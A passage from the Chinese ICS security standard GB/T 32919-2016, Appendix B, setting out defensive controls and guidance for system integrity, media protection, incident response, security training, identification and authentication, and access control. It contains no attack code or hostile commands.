按照既定的时间框架实现安全指令。 补充指导: a) 安全报警和安全指令由国家互联网应急响应中心(CNCERT/CC) 等机构发布; b) 由于这些安全报警和安全指令可能对组织ICS 产生一定的影响,遵守这些报警和指令,实施 相应的防护是必须的; c) 相关安全控制:SI-2。 控制增强: a) 组织采用自动化机制及时获取组织所需的这些安全报警和安全指令。 B.11.6 安全功能验证(SI-6) 控制: 组织应: a) 验证在异常发生时,ICS 按照定义的动作实现了准确的安全功能 b) 在系统启动或重启时实施安全验证或者按【赋值:组织定义的时间间隔】实施安全验证 c) 将失败的测试情况通知相关人员。 补充指导: a) 安全功能验证适应于所有的安全功能; b) 对于那些不能够执行自动化测试的安全功能,组织可以实现补偿安全控制,或显式地接受不 GB/T 32919—2016 需要执行验证的风险; c) 一般地,不建议依据标识的异常就宕机或重启动 ICS; d) 相关安全控制:CA-7、CM-6。 控制增强: a) 系统应提供自动安全验证失败通知功能; b) 系统应提供自动安全验证支持功能; c) 应向组织相关负责人报告安全功能验证结果。 B.11.7 软件和信息完整性(SI-7) 控制: a) 组织应检测与保护软件和信息,以防止对软件和信息未经授权的更改。 补充指导: a) 对 ICS 采用完整性校验应用软件,以查找信息篡改、错误和删除的迹象 b) 采用软件工程实践中现成的通用完整性机制,如奇偶检验、循环冗余检验、散列加密等; c) 采用工具自动监控完整性信息; d) 在检测到完整性受到破坏后具有恢复的措施; e) 组织应确保使用的完整性验证应用没有负面影响ICS 的运行性能; f) 相关安全控制:SA-12 、SC-8 、SC-13,SI-3。 控制增强: a) 组织应按【赋值:组织定义的频度】重新评估软件和信息的完整性; b) 组织应提供自动化机制,在软件和信息完整性异常时通知相关负责人; 增强补充指导: 1) 在组织不使用自动化工具来通告完整性不适用的情况下,组织应按裁剪指导,使用非自 动化机制或规程作为补偿控制。 c) 组织应集中管理完整性验证工具; d) 在传输和使用过程中,组织应提供明显的防篡改包。 B.11.8 输入验证(SI-8) 控制: a) 组织应验证授权人员输入信息的有效性。 补充指导: a) 对输入人信息进行语法和语义检查,包括字符集、长度、数值范围和可接受的值等; b) 通过检查防止非法命令被有意/无意地输入到系统,造成系统运行异常; c) 相关安全控制:CM-3 、CM-5。 控制增强: a) 提供手动重写机制用于输入验证,确保该功能仅用于授权人员,并对该功能进行审计; b) 确保按【赋值:组织定义的时间间隔】对输入验证错误的审查; c) 在收到无效输入时,确保ICS 按照预定的方式运行; d) 对无效输人的响应不应该影响正常运行时序; e) 按组织预定义的格式和内容限制系统输入。 B.11.9 错误处理(SI-9) 控制: GB/T 32919-2016 ICS 应: a) 确定潜在的安全相关错误条件; b) 在错误日志中产生足以用于纠错的错误信息; c) 仅向授权人员显示错误信息。 补充指导: a) 组织应仔细考虑错误信息的结构和内容; b) 在组织策略和运行需求的指导下,错误信息的内容可被系统标识和处理; c) 敏感信息,如账号、密码等不应出现在错误日志中; d) 相关安全控制:AU-2、AU-3。 控制增强:无 B.11.10 信息处理和留存(SI-10) 控制: a) 组织应根据可相关法律、法规、规章、制度、标准以及运行要求,对ICS 的输出信息进行处理和 留存。 补充指导: a) 信息处理和留存应涵盖信息的全生命周期。 b) 相关安全控制:AC-16、AU-5、AU-11、MP-2、MP-4。 控制增强:无 B.11.11 可预见失效预防(SI-11) 控制: 组织应: a) 确定在特定运行环境中信息组件的平均故障时问; b) 提供可替代的工业控制系统组件、对组件进行激活和建立主备切换的机制。 补充指导: a) 虽然平均故障时间是可靠性问题,本控制关注提供安全功能的特定系统组件; b) 主备切换应不影响系统的可靠性、稳定性和安全性; c) 除切换期间或维护原因,备用系统应一直可用; d) 相关安全控制:CP-2 、CP-10、MA-6。 控制增强: a) 组织应在不迟于平均故障时间内,或【赋值:组织定义的时间间隔】内,实现主备组件的切换; b) 组织应禁止在无监督的情况下实施切换; c) 组织应在定义的时间间隔内手动完成主备组件的切换; d) 如果检测到系统组件故障,组织应确保备用系统组件成功并透明地在定义的时间段内发挥 作用。 B.11.12 输出信息过滤(SI-12) 控制: a) 组织应确认软件和应用输出的信息与期望的内容相吻合。 补充指导: a) 重点是检测无关的内容,防止多余的内容被显示。 b) 相关安全控制:SI-3 、SI-4。 控制增强:无 B.11.13 内存防护(SI-13) 控制: a) ICS 应执行安全保护措施,以防代码在内存中进行未授权的执行。 补充指导: a) 部分攻击行为专注于非执行区域内存攻击;内存防护的安全保障措施包括,数据执行预防和地 址空间布局随机化处理。 b) 相关安全控制:SC-3。 控制增强:无 B.11.14 故障安全程序(SI-14) 控制: a) 组织应定义 ICS 发生故障时的安全处理程序。 补充指导; a) 故障条件包括,关键系统组件之间的通信损失,系统组件和操作设备之间的通信故障等。 b) 故障安全程序包括,提醒操作人员,并提供后续步骤的具体指令(什么也不做,恢复系统设置, 关闭程序,重新启动系统,或与指定的人员联系等)。 c) 相关安全控制:CP-12 、CP-13 、SC-24 、SI-13。 控制增强:无 B.11.15 入侵检测和防护(SI-15) 控制: a) 组织应在ICS 安全建设方案中考虑部署入侵检测和防护系统(IDS/IPS)。 补充指导: a) 部 署IDS/IPS 产品应不影响 ICS 正常运行。 b) 相关安全控制:PL-2。 控制增强:无 B.12 介质保护(MP) B.12.1 介质保护策略和规程(MP-1) 控制: 组织应: a) 制定并发布正式的介质保护策略,其中应包含目的、范围、角色、责任、管理承诺、各部门间的协 调以及合规性; b) 制定并发布正式的介质保护规程,以推动介质保护策略以及相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对介质保护策略和规程进行评审和更新。 补充指导: a) 通过该控制来有效实现介质保护族中安全控制和安全增强的策略和规程; b) 应与相关的法律、法规、制度、政策和标准保持一致; c) 介质保护策略可作为组织信息安全策略的一部分; d) 介质保护规程一般可针对安全程序予以开发,也可针对特殊的ICS 予以开发; e) 在开发系统和服务获取策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.12.2 介质访问(MP-2) 控制: a) 组织应规定介质的访问策略,严格控制对组织介质的访问。 补充指导: a) 介质包括数字介质和非数字介质,其中,数字介质包括:硬盘、光盘、软盘、U 盘等,非数字介质 包括文档、缩微胶片等; b) 相关安全控制:AC-3、IA-2、MP-4、PE-2、PE-3、PL-2。 控制增强: a) 默认禁止访问; b) 加密保护。 B.12.3 介质标记(MP-3) 控制: a) 组织应按照【赋值:组织定义的规范】标记介质的分发范围、访问要求、处理要求、销毁要求等。 补充指导:无 控制增强:无 B.12.4 介质存储(MP-4) 控制: 组织应: a) 在受控区域中,采取物理控制措施并安全地存储磁带、外置/可移动硬盘、U 盘或其他 Flash 存 储介质、软盘、CD 、DVD 等介质。 b) 定义设施内用来存储信息和存放工业控制系统的受控区域。 c) 为这些介质提供持续保护,直到利用经批准的设备、技术和规程对其进行破坏或净化。 补充指导: a) 介质包括数字介质和非数字介质。 b) 相关安全控制:CP-6 、MP-2。 控制增强: a) 加密存储,物理安全保护; b) 严格访问控制。 B.12.5 介质传输(MP-5) 控制: 组织应: a) 在受控区域之外传递磁带、外置/可移动硬盘、U 盘或其他 Flash 存储介质、软盘、CD 和 DVD 时,采用适当的安全防护措施进行保护和控制。 b) 维护介质在受控区域之外传递过程的可核查性。 c) 对介质传递相关活动进行记录。 d) 只允许授权人员参与介质传递有关的活动。 补充指导: GB/T 32919—2016 a) 介质包括数字介质和非数字介质。 b) 相关安全控制:CP-6、MP-2、MP-3、MP-4。 控制增强: a) 组织控制区域外加强介质保护; b) 文档化介质传输相关活动; c) 加强介质传输过程中对委托人管理; d) 在介质传输过程中进行加密处理。 增强补充指导: 1) 在 ICS 不支持密码机制的情况下,组织应按裁剪指导,使用补偿控制(例如,实现物理安 全措施)。 B.12.6 介质销毁(MP-6) 控制: 组织应: a) 根据介质销毁有关规定和标准,在介质报废、组织控制外使用、回收使用前,采用销毁技术和规 程对介质进行销毁。 b) 所采用的销毁机制的强度、覆盖范围应与介质中信息的安全类别或级别相匹配。 补充指导: a) 该控制适用于组织所有的介质; b) 销毁前应确保介质内的信息不能恢复或重建; c) 销毁技术,包括清除、密码清除、物理破坏,以防止信息泄露; d) 组织确定合适的销毁方法是必要的,其他的方法不能应用于介质销毁; e) 组织应使用批准的销毁技术和程序; f) 相关安全控制:MA-2、MA-4、RA-3。 控制增强: a) 介质销毁前的审阅、批准、跟踪、文件与验证机制;组织审查和批准的介质销毁,以确保符合组 织政策,跟踪、文件销毁行动,并验证该销毁过程的合规性。 b) 组织测试销毁设备和销毁程序,以验证预期的处理结果。 c) 组织按定义的方式销毁便携式存储设备。 d) 组织应按国家相关法律、法规规定销毁涉密和受控设备。 B.12.7 介质使用(MP-7) 控制: a) 组织应采取安全防护措施限制或禁止在ICS 系统和组件中介质(包含数字介质和非数字介质) 的使用。 补充指导: a) ICS 中介质包括数字介质和非数字介质; b) 数字介质包括磁带、外置/可移动硬盘、U 盘或其他 Flash 存储介质、软盘、CD 和 DVD 等; c) 非数字介质包括文件、文档或胶片; d) 该控制应包括具有拍照、存储功能的智能手机、平板电脑、阅读器、相机等; e) 组织应采用技术和非技术手段(如:政策、流程和行为规范等)来规范介质的使用; f) 相关安全控制:PL-4。 控制增强: a) 组织应禁止未标识的便携式设备在 ICS 使用; b) 组织应禁止使用不方便实施销毁和净化处理的介质。 B.13 事件响应(IR) B.13.1 事件响应策略和规程(IR-1) 控制: 组织应: a) 制定并发布正式的的事件响应策略,其中应包含月的、范围、角色、责任、管理承诺、各部门间的 协调以及合规性; b) 制定并发布正式的事件响应规程,以推动事件响应方针策略及与相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对事件响应策略和规程进行评审和调整。 补充指导: a) 有效实现该族中的安全控制和控制增强,编制所需要的策略和规程。 b) 该策略和规程应与应用的法律、法规、政策、规章、制度、标准和指南是一致的。 c) 事件响应策略可作为组织信息安全策略的…部分。 d) 事件响应规程可针对一般性的安全程序予以开发:也可针对特殊 ICS 予以开发。 e) 在开发配置管理策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.13.2 事件响应培训(IR-2) 控制: 组织应: a) 制定事件响应培训计划,并按【赋值:组织定义的时间间隔】对ICS 用户进行符合其角色和责任 的事件响应培训; b) 按【赋值:组织定义的时间间隔】或在 ICS 发生变更时向ICS 用户提供符合其角色和责任的事 件响应培训。 补充指导: a) 事件响应培训包括用户培训一标识和报告来自内外源的嫌疑活动。 b) 相关安全控制:AT-3 、CP-4 、IR-8。 控制增强: a) 组织把模拟事件和事件响应结合起来进行培训,以便支持人员在危机情况下的有效响应; b) 组织使用自动化机制,提供更全面、更真实的培训环境。 B.13.3 事件响应测试与演练(IR-3) 控制: 组织应: a) 按【赋值:组织定义的时间间隔】以【赋值:组织定义的测试和演练方法】测试 ICS 的响应能力, 以判断事件响应的有效性,并记录测试结果。 b) 评审事件响应测试和演练的结果;如有不合格项应启动纠正措施。 补充指导: a) 事件响应培训包括用户培训一标识和报告来自内外源的嫌疑活动。 b) 相关安全控制:CP-4 、IR-8。 控制增强: a) 组织使用自动化机制,更全面、更有效地测试或演练事件响应能力。 增强补充指导: 1) 自动化机制可以提供更全面、更有效的测试或演练事件响应能力,因为自动化机制可以提 供更完整的覆盖事件响应问题,选择更真实的测试或演练场景和环境,以及更有效地强调 响应能力。 B.13.4 事件处理(IR-4) 控制: 组织应: a) 具有应对安全事件的事件处理能力,包括准备、检测和分析、控制、消除和恢复。 b) 协调事件处理活动与应急规划活动。 c) 将当前事件处理活动的经验,纳入事件响应规程、培训及测试/演练,并相应地实施变更。 补充指导: a) 与事件有关的信息可以从一些不同的源中获取,包括但不限于:审计监视,网络监视,物理访问 监视和用户报告。 b) 相关安全控制:CP-2 、CP-4 、IR-2 、IR-3。 控制增强: a) 组织使用自动化机制,例如在线的事件管理系统,支持事件处理过程; b) 组织关注 ICS 的动态重新配置,作为事件响应能力的一部分; 增强补充指导: 1) 动态重新配置,例如:路由规则的改变,访问控制列表的改变,入侵检测系统参数的改变, 以及防火墙和网关过滤规则的改变。 c) 组织标识事件类别(例如:有目标的有意攻击,无目标的有意攻击,由于设计或实现中的错误和 忽略),并定义响应中所采取的合适动作,确保使命/业务运行的继续; d) 组织建立事件信息和单个事件响应的联系,以实现对有关事件做出及时正确的响应; e) ICS 一旦出现【赋值:组织定义的安全损坏列表】中的损坏,组织为此实现可配置的能力,使其 停止运行。 B.13.5 事件监控(IR-5) 控制; a) 组织应跟踪和记录 ICS 安全事件,并建立相应的文档。 补充指导: a) 与事件有关的信息可以从不同的源中获得,包括但不限于:审计监视、网络监视、物理访问监视 和用户或管理人员的报告。 b) 应当引起重视或进行重点监控的事件包括:网络流量突然增大、磁盘空间溢出或空闲磁盘空 间明显减少、异常高的 CPU 使用率、新用户账号创建、试图或实际使用超级管理员级的账号、 账户锁定、用户不工作时,账号仍在使用、清除日志文件、以不常用的大量事件塞满日志文件、 防病毒或 IDS 警报、不可用的防病毒软件和其他安全控制措施、不期望的补丁变更、非法外联、 请求系统信息、配置设置的非期望更改、非期望的系统关闭或重启等。 c) 相关安全控制:AU-6 、IR-6 、IR-7 、SC-5。 控制增强: a) 组织使用自动化机制,支持安全事件的跟踪,支持事件信息的收集和分析。 GB/T 32919-2016 B.13.6 事件报告(IR-6) 控制: 组织应: a) 在规定时间内,向组织的事件响应部门报告可疑的安全事件。 b) 向相关主管部门报告安全事件信息。 补充指导: a) 通过该控制来强调组织内特定的事件报告需求以及正式的事件报告需求; b) 报告的安全事件类型,报告的内容和时间,以及指定的报告机构,应与可用的国家法律、法规、 制度、标准和指南是一致的; c) 相关安全控制:IR-4 、IR-5。 控制增强: a) 应使用自动化机制,支持安全事件的报告; b) 向合适的组织官员,报告ICS 中与所报告的安全事件相关的弱点、不足和脆弱性。 B.13.7 事件响应支持(IR-7) 控制: a) 组织应提供事件响应支持资源,集成组织事件响应能力,即为 ICS 用户提供设备和支持,以便 处理和报告安全事件。 补充指导: a) 在组织中,事件响应支持资源的实现可能涉及一个支持小组。 b) 相关安全控制:AT-2 、IR-4。 控制增强: a) 组织使用自动化机制,增加与事件响应有关信息和支持的可用性; b) 组织在其事件响应能力和外部提供方之间,建立一种直接协作的关系;向外部提供方,标识组 织的事件响应小组成员。 B.13.8 事件响应计划(IR-8) 控制: 组织应; a) 制定事件响应计划,该计划应包括:实施路线图;事件响应的结构和组织;满足组织的有关使 命、规模、结构和功能的特殊要求;定义可报告事件;定义必要的资源和管理支持,以维护和增 强事件响应能力; b) 评审和批准事件响应计划,并向组织内事件响应人员发布; c) 按【赋值:组织定义的时间间隔】评审该事件响应计划; d) 针对系统/组织的变更或事件响应计划在实施、执行或测试中遇到的问题,更新计划; e) 将事件响应计划的变更通报组织内相关部门和人员; f) 使事件响应计划处于受控状态。 补充指导: a) 组织应有一个正式的、集中的、协调一致的途径来响应事件; b) 组织有关事件响应的使命、战略和目标,帮助确定其事件响应能力的结构; c) 相关安全控制:AT-2、IR-4 、SA-9。 控制增强:无 B.14 教育培训(AT) B.14.1 教育培训策略和规程(AT-1) 控制: 组织应; a) 制定并发布正式的教育培训策略,其中应包含目的、范围、角色、责任、管理承诺、部门间的协调 以及合规性; b) 制定并发布正式的教育培训规程,以推动教育培训策略及相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对教育培训策略和规程进行评审和调整。 补充指导: a) 为有效实现该族中的安全控制和控制增强,编制所需要的策略和规程。 b) 该策略和规程应与应用的法律、制度、政策、规章、标准和指南是一致的。 c) 学习与培训策略可作为组织信息安全策略的一部分。 d) 学习与培训规程可针对一般性的安全程序予以开发;当需要时,可针对特殊 ICS 予以开发。 e) 在开发配置管理策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.14.2 安全意识培训(AT-2) 控制: 组织应: a) 为包括管理员、高级管理层、承包商在内的 ICS 用户提供安全意识培训; b) 在新用户的培训中纳入安全意识培训; c) 按【赋值:组织定义的时间间隔】或系统变更需要培训时,进行安全意识培训,安全意识培训内 容应包括 ICS 特定安全方针策略,安全操作程序,ICS 安全趋势和安全漏洞等。 补充指导: a) 组织应根据安全策略的需要以及ICS 安全需求,以确定适当的安全意识培训内容,内容包括信 息安全、用户操作维护安全和应对可能的安全事件处理技术等; b) ICS 安全意识培训包括 ICS 特定策略、标准的操作规程、安全趋势以及脆弱性的评审以及它们 的定期评审; c) ICS 的意识培训大纲应与组织所建立的有关安全意识和培训策略的需求相一致; d) 培训时机包括:新用户培训、ICS 调整或【赋值:组织定义的培训周期】; e) 相关安全控制:AT-3 、AT-4 、PL-4。 控制增强: a) 组织开展包括实际练习的安全意识培训以模拟实际的安全攻击; b) 组织开展包括识别和报告内部潜威胁的安全意识培训。 B.14.3 基于角色的安全培训(AT-3) 控制: 组织应: a) 为 ICS 中的安全角色和具有安全职责的人员提供安全培训; b) 在新用户的培训中纳入安全培训; c) 按【赋值:组织定义的时间间隔】或系统变更需要培训时,进行安全培训,安全培训内容应包括 GB/T 32919-2016 ICS 特定安全方针策略,安全操作程序,ICS 安全趋势和安全漏洞等。 补充指导: a) 组织在分配个人的角色和责任,进行ICS 授权访问或满足组织的特定安全要求时,进行基于角 色的安全培训,并确定适当的安全培训内容; b) 安全培训包括初始的 ICS 特定策略、标准的操作规程、安全趋势以及脆弱性的评审以及它们 的定期评审; c) ICS 的培训大纲应与组织所建立的有关安全培训策略的需求相一致; d) 培训时机包括:在对 ICS 进行授权访问或执行人员任务分配时、在 ICS 调整后或者根据【赋 值:组织定义的培训周期】; e) 相关安全控制:AT-2 、AT-4 、PL-4。 控制增强: a) 组织根据初始或定义的频度的人员和角色培训; b) 组织开展包括实际操作的安全培训,以增强安全培训的目标; c) 组织应向内部人员提供安全培训,使能够识别 ICS 存在的异常行为。 B.14.4 安全培训记录(AT-4) 控制: 组织应: a) 记录并监视ICS 安全培训活动,包括基本的安全意识培训和具体的 ICS 安全培训; b) 在【赋值:规定的时间】内保留培训记录。 补充指导: a) 应维护安全培训记录。 b) 相关安全控制:AT-2 、AT-4。 控制增强:无 B.15 标识与鉴别(IA) B.15.1 标识与鉴别策略和规程(IA-1) 控制: 组织应: a) 制定并发布正式的标识与鉴别策略,内容包括目的、范围、角色、责任、管理承诺、组织实体间的 关系等; b) 制定并发布正式的标识与鉴别规程,以推动标识与鉴别方针策略及与相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对标识与鉴别策略及规程进行评审和更新。 补充指导: a) 标识与鉴别策略和规程应与相关的法律、法规、政策、策略及标准相一致; b) 标识与鉴别策略可以包含在组织的通用信息安全策略中,也为一般的安全程序或特殊 ICS 制 定标识与鉴别规程。 控制增强:无 B.15.2 组织内用户的标识与鉴别(IA-2) 控制: a) 组织应唯一标识和鉴别组织用户(员工、供应商人员及访客等)或代表该用户的进程。 补充指导: a) 用户的所有访问都要被唯一的标识和鉴别,确保用户名具有唯一性,且专供用户个人使用; b) 当用户功能可以归为同一类(比如控制室操作员)时,用户身份鉴别与认证可以基于角色、组 或者设备; c) 对于一些ICS, 操作员及时响应很重要,身份识别与认证要求绝不能影响系统的本地紧急响 应,对这些系统的访问可以通过合适的物理安全措施来限制; d) 对于一定的 ICS, 操作员的即刻交互能力是至关重要的; e) ICS 的本地紧急措施并非受到标识与鉴别需求的束缚,对这些系统的访问可受到合适的物理 安全控制的限制; f) 在某些情况下,组织认为不适用该控制,可以在安全计划中记录原因,并选取必要的补偿控制。 例如,为了建立远程访问,可能需要远程人员的人工语音鉴别,需要一些人工的动作; g) 相关安全控制:AC-2、AC-3 、IA-4 、IA-5。 控制增强: a) 对已授权账户的网络访问,使用多因子鉴别; b) 对未授权账户的网络访问,使用多因子鉴别; c) 对已授权账户的本地访问,使用多因子鉴别; d) 对未授权账户的本地访问,使用多因子鉴别; 增强补充指导: 1) 在 该ICS 不支持多因子鉴别的情况下,组织应按裁剪指导,使用合适的补偿控制(例如, 实现物理安全措施)。 e) 对未授权账户的本地和网络访问,使用口令或个人标识码; f) ICS 对本地访问,使用口令或个人标识码; g) 组织应仅当与个体或特定鉴别员一起使用时,才使用组鉴别;要求在使用组鉴别机制前,要用 个体鉴别机制对个体进行鉴别; h) 对未授权账户的远程访问,使用多因子鉴别,其中一个因子要由与该ICS 分离的设备提供。 B.15.3 设备标识与鉴别(IA-3) 控制: a) 在建立一个或多个本地、远程、网络连接前,组织应【赋值:定义的特定设备和设备类型列表】。 补充指导: a) 要求逐一予以标识与鉴别的设备,可以按类型或按特定设备予以定义,或按组织认为合适的组 合类型和设备予以定义; b) 针对标识和组织鉴别解决方案(例如,国家标准 GB/T 28455—2012《信息安全技术 引入可信 第三方的实体鉴别及接入架构规范》等),ICS 一般使用强制访问控制(MAC) 或传输控制协议 来标识和鉴别本地网和广域网上的设备; c) 设备鉴别机制所要求的强度,是由ICS 的安全分类来确定的; d) 在 ICS 不支持设备标识与鉴别的情况下,组织应按裁剪指导,使用合适的补偿控制(例如,实 现物理安全措施); e) 相关安全控制:IA-4 、IA-5。 控制增强: a) 在建立远程网络连接前,ICS 应以密码技术为基础,使用设备之间的双向鉴别来鉴别设备; b) 在建立网络连接前,ICS 以密码技术为基础,使用设备之间的双向鉴别来鉴别设备; c) 组织针对动态地址分配,标准化动态主机控制协议(DHCP) 的专用信息以及赋予设备的时间; GB/T 32919—2016 并当把这些信息赋予一个设备时,对专用信息进行审计。 B.15.4 标识符管理(IA-4) 控制: 组织应: a) 按照授权策略分配个人、组、角色或设备标识符; b) 选择用于识别个人、组、角色或设备的标识符; c) 将标识符分配给指定的个人、组、角色或设备; d) 在【赋值:组织定义的时间间隔】内防止对标识符的重用; e) 在【赋值:组织定义的时间间隔】内清除不活动的标识符。 补充指导: a) 通用设备标识符,包括强制访问控制(MAC) 或互联网协议(TCP/IP) 的地址,或设备独特的令 牌标识符; b) 管理用户标识符,不可用于共享的ICS 账户(例如:贵宾账户和匿名账户); c) 用户标识符是ICS 的一个与个体相关联的账户的名字,在这样实例中,账户管理活动(AC-2) 更强调标识符管理; d) 在用户职能作为单一小组(例如,控制屋操作员)的情况下,用户标识可以是基于角色的、基于 小组的、或是基于设备的; e) 相关安全控制:AC-2I、A-2、IA-3。 控制增强: a) 应禁止使用ICS 账户标识符作为用户电子邮件账户的公共标识符; b) 应要求接受用户 ID 和口令的登记,应具有监督人员的授权,并在指定登记授权前由人来 完成; c) 应要求多种形式个体身份的认证,如对该登记授权给出有文件的证据,或给出文件以及生物特 征的组合; d) 应按【赋值:组织定义的方式】标识用户状态的特征,唯一地标识用户,以此来管理用户标识符; e) ICS 动态地管理标识符、属性以及相关联的访问授权。 B.15.5 鉴别符管理(IA-5) 控制: 组织应: a) 在初始鉴别分发时验证鉴别接收对象(个人、组、角色或设备)的身份 b) 确定【赋值:组织定义的初始鉴别的内容】; c) 确保鉴别对于其预期使用具有足够强的机制; d) 建立和实现管理规程,覆盖鉴别的初始分发、丢失或受损处置以及收回过程 e) 在工业控制系统安装之前变更鉴别的默认内容; f) 建立鉴别的最小和最大生存时间、限制以及再用条件; g) 按【赋值:组织定义的时间间隔】变更或更新鉴别; h) 保护鉴别内容,以防未授权泄露和更改; i) 要求个人采取由设备或特定安全措施来保护鉴别; j) 在组/角色账户的成员发生变化时变更这些账户的鉴别。 补充指导: a) ICS 认证设备包括;PKI 证书、生物特征、口令、密钥卡等; b) 许多ICS 设备和软件通常采用厂商缺省认证证书以进行安装和配装,应及时更换; c) 相关安全控制:AC-2、AC-3、AC-6、CM-6、IA-2、IA-4。 控制增强; a) 对于基于 PKI 的鉴别,ICS 应: 1) 针对一个接受的可信物,通过构造一个具有状态信息的认证路径,来确认证书; 2) 对对应的私钥,执行授权访问; 3) 把所认证的身份映射为用户账户; b) 组织要求接受【赋值:组织定义的鉴别符类型或特定鉴别符的注册过程】,在出指定组织官员 赋予注册授权之前由人来承担; c) 组织使用自动化工具来确定该鉴别符对抵御企图揭示或损坏该鉴别符的攻击而言是否具有充 分的强度; d) 组织要求ICS 部件供应商或制造者在交付之前,提供唯一的鉴别符或改变默认的鉴别符; e) 对于基于口令的鉴别,ICS 应: 1) 实施按组织就敏感情况、字符个数、大写小写字符和数字的混合,以及特殊字符等方面定 义的需求的最小口令复杂性; 2) 当创建新口令时,实施按【赋值:组织定义的字符个数】; 3) 在口令存储和传输中,对口令加密处理; 4) 实施按【赋值:组织定义的口令最大和最小生存期】的限制; 5) 实施按【赋值:组织定义的生成次数】,禁止口令复用; f) 组织保护鉴别符,使其相称于所访问信息的保密性和敏感性; g) 组织确保口令没有被嵌人在访问脚本中或存储在功能键上; h) 由于存在一些在多个 ICS 上拥有账户的个体,因此组织采取【赋值:组织定义的措施】,管理破 坏性风险; 增强补充指导 当一个个体在多个 ICS 上拥有账户的时候,存在以下风险: 一旦一个账户被破坏,并且该 个体是使用同样的用户标识符和鉴别符,那么其他账户也将被破坏。可选的方案包括但不 限于: 1) 在所有的系统上有同样的标识符,但鉴别符不同; 2) 在每一系统上有不同的用户标识符号和鉴别符号; 3) 使用某种形式的单一签名机制; 4) 在所有系统上使用某种形式的一次性口令。 i) 组织应规定对授权账户的网络访问,使用【赋值:组织定义的·次性鉴别机制】; j) 组织应规定对未被授权账户的网络访问,使用【赋值:组织定义的一次性鉴别机制】。 B.15.6 鉴别反馈(IA-6) 控制: a) ICS 应隐蔽鉴别过程期间鉴别信息的反馈,以保护该信息免遭未授权个体的利用。 补充指导: a) 来 自ICS 的反馈不提供可使未授权用户损害鉴别机制的信息。 b) 相关安全控制:PE-18。 控制增强:无 B.15.7 密码模块鉴别(IA-7) 控制: GB/T 32919—2016 a) ICS 使用满足相关法律、法规、政策、规定、标准和指南等需求的鉴别相关的密码模块。 补充指导: a) 密码模块应符合相关密码管理部门规定和标准; b) 应在认真考虑安全需要以及对系统性能的潜在结果之后,确定要使用的密码技术。例如,组 织考虑由于使用密码技术而引入的潜在因素是否负面影响了该ICS 的运行性能; c) 相关安全控制:AC-2、IA-2、IA-4。 控制增强:无 B.15.8 组织外用户的标识与鉴别(IA-8) 控制: a) ICS 应逐一标识和鉴别非组织的用户或标识和鉴别代表非组织用户所执行的过程。 补充指导: a) 非组织用户是组织内用户以外的ICS 用户。非组织用户访问ICS 的身份验证需要保护专有或 隐私相关的信息。组织使用风险评估方法,以确定身份验证的需求,并考虑可扩展性、实用性 和安全性的平衡。 b) 相关安全控制:AC-2、IA-2、IA-4、MA-4、RA-3、SA-12。 控制增强: a) ICS 接受并鉴别其他相关机构发布的单子标识与鉴别; b) ICS 只接受经权威机构批准的第三方认证; c) 组织只采用相关权威机构批准的ICS 组件第二方认证。 B.16 访问控制(AC) B.16.1 访问控制策略和规程(AC-1) 控制: 组织应: a) 制定并发布正式的访问控制策略,内容包括目的、范围、角色、责任、管理承诺、组织实体间的协 调关系以及依从关系等; b) 制定并发布正式的访问控制章程,以推动访问控制方针策略及与相关安全控制的实施 c) 按【赋值:组织定义的时间间隔】,对访问控制策略及规程进行评审和更新。 补充指导: a) 访问控制策略和章程应与相关的法律、法规、规章、制度、策略及标准相一致; b) 访问控制策略可以包含在组织的通用信息安全策略中,也可为一般的安全程序或特殊ICS 制 定访问控制规程。 控制增强:无 B.16.2 账户管理(AC-2) 控制: a) 组织应管理ICS 账户,包括建立、激活和修改、审核、失效和删除账户; b) 组织应按【赋值:组织定义的时间间隔】审核ICS 账户。 补充指导: a) 账户管理包括账户类型的识别(个人、组、系统),组成员条件的确定和相关授权的分配; b) 账户类型可以是基于角色、基于设备、基于属性等; GB/T 32919—2016 c) 应识别ICS 的授权用户和特定的访问控制权利; d) 应明确地授权和监督客人和匿名账户的使用; e) ICS 使用者或用户属性发生变化时,应通知账户管理人; f) 在为物理访问ICS(例如,工作站,硬件部件,场站设备)预先定义了一些特权账号的情况下,或 在 ICS 不支持账号管理(例如, 一些远程终端单元,基站)的情况下,组织按一般的裁减指导,使 用合适的补偿控制(例如,提供增强的物理安全、人员管理、入侵检测和审计措施); g) 应要求产品或设备供应商告知系统存在的默认账户和口令; h) 应删除、禁用或对默认账户提供安全维护,严格限制默认账户的访问权限,重命名系统默认账 户,修改默认账户的默认口令; i) 相关安全控制:AC-3、AC-4、AC-5、AC-6、AC-10、AC-17、AC-19、AC-20、AU-9、IA-2、IA-4、IA- 5、IA-8、CM-5、CM-6、CM-11、MA-3、MA-4、MA-5、PL-4、SC-13。 控制增强: a) 应使用自动机制来支持对ICS 账户的管理。对于某些ICS 部件(如现场设备),账户管理的自 动机制不可用的情况下,组织按裁减指导,使用非自动化机制或规程作为一个补偿控制; b) 在规定的时间周期后应及时删除临时的和非常时期的账户; c) 在规定的时间周期后及时删除非活动的账户; d) 应使用自动机制来审计账户的创建、修改、失效和终止等活动,需要时通知相关人员。 B.16.3 强制访问控制(AC-3) 控制: a) ICS 应根据应用策略执行指定的系统访问控制授权。 补充指导; a) 组织应采用访问控制策略(如:基于身份的策略、基于角色的策略、基于规则的策略)和相关访 问控制机制(如:访问控制列表、访问控制许可、密码技术)实现 ICS 用户与对象(包括设备、文 件、程序、进程、域)间的访问控制; b) 为提供更佳的安全,除在 ICS 层面实现访问控制外,必要时还应在应用层面实现强制访问 控制; c) 针对所有主体和客体,应实施基于角色的访问控制策略; d) 针对 ICS 范围内属性相同的主体和客体,执行统一策略; e) 应限制将信息传递给未授权的主体和客体; f) 应限制将权限授予给未授权的主体和客体; g) 应限制对主体、客体、工业控制系统或其组件安全属性的变更; h) 应限制对访问控制策略的更改; i) 强制访问控制机制不应对ICS 正常运行产生不利影响; j) 相关安全控制: AC-2、AC-4、AC-5、AC-6、AC-16、AC-17、AC-18、AC-19、AC-20、AC-21、AC- 22、AU-9、CM-5、CM-6、CM-11、MA-3、MA-4、MA-5、PE-3。 控制增强: a) 基于【赋值:组织定义的权利要求】的组织策略和规程,执行二元访问授权; b) 在【赋值:组织规定的用户集和资源集】上,执行【赋值:组织定义的非自主访问控制策略】; c) ICS 执行自主访问控制(DAC) 策略; d) 